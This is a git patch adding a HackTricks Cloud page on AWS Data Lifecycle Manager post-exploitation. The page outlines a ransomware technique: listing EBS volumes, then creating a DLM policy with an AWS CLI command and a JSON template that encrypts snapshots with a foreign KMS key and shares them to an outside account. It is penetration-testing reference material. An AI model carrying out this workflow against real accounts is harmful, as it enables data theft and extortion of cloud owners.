From 571dcb827574bff3b5868fc6525e5c5f591a35be Mon Sep 17 00:00:00 2001
From: BrandonLedyard <44955493+BrandonLedyard@users.noreply.github.com>
Date: Thu, 29 Feb 2024 15:51:15 -0500
Subject: [PATCH] Create aws-dlm-post-exploitation.md

PR for bonus points on ARTE exam. User BrandonLedyard (known on discord as RiderOfMooses).
---
 .../aws-dlm-post-exploitation.md | 119 ++++++++++++++++++
 1 file changed, 119 insertions(+)
 create mode 100644 pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md
diff --git a/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md
new file mode 100644
index 000000000..62a6ddb2c
--- /dev/null
+++ b/pentesting-cloud/aws-pentesting/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -0,0 +1,119 @@
+# AWS - Data Lifecycle Manager
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Data Lifecycle Manger (DLM)
+
+### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
+
+A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+
+Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+
+```aws ec2 describe-volumes```
+
+Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs. 
+
+
+```bash
+aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
+```
+
+A template for the policy document can be seen here:
+```bash
+{
+ "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+ "ResourceTypes": [
+ "VOLUME"
+ ],
+ "TargetTags": [
+ {
+ "Key": "ExampleKey",
+ "Value": "ExampleValue"
+ }
+ ],
+ "Schedules": [
+ {
+ "Name": "DailySnapshots",
+ "CopyTags": true,
+ "TagsToAdd": [
+ {
+ "Key": "SnapshotCreator",
+ "Value": "DLM"
+ }
+ ],
+ "VariableTags": [
+ {
+ "Key": "CostCenter",
+ "Value": "Finance"
+ }
+ ],
+ "CreateRule": {
+ "Interval": 24,
+ "IntervalUnit": "HOURS",
+ "Times": [
+ "03:00"
+ ]
+ },
+ "RetainRule": {
+ "Count": 14
+ },
+ "FastRestoreRule": {
+ "Count": 2,
+ "Interval": 12,
+ "IntervalUnit": "HOURS"
+ },
+ "CrossRegionCopyRules": [
+ {
+ "TargetRegion": "us-west-2",
+ "Encrypted": true,
+ "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+ "CopyTags": true,
+ "RetainRule": {
+ "Interval": 1,
+ "IntervalUnit": "DAYS"
+ }
+ }
+ ],
+ "ShareRules": [
+ {
+ "TargetAccounts": [
+ "123456789012"
+ ],
+ "UnshareInterval": 30,
+ "UnshareIntervalUnit": "DAYS"
+ }
+ ]
+ }
+ ],
+ "Parameters": {
+ "ExcludeBootVolume": false
+ }
+}
+```
+
+
+
+Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+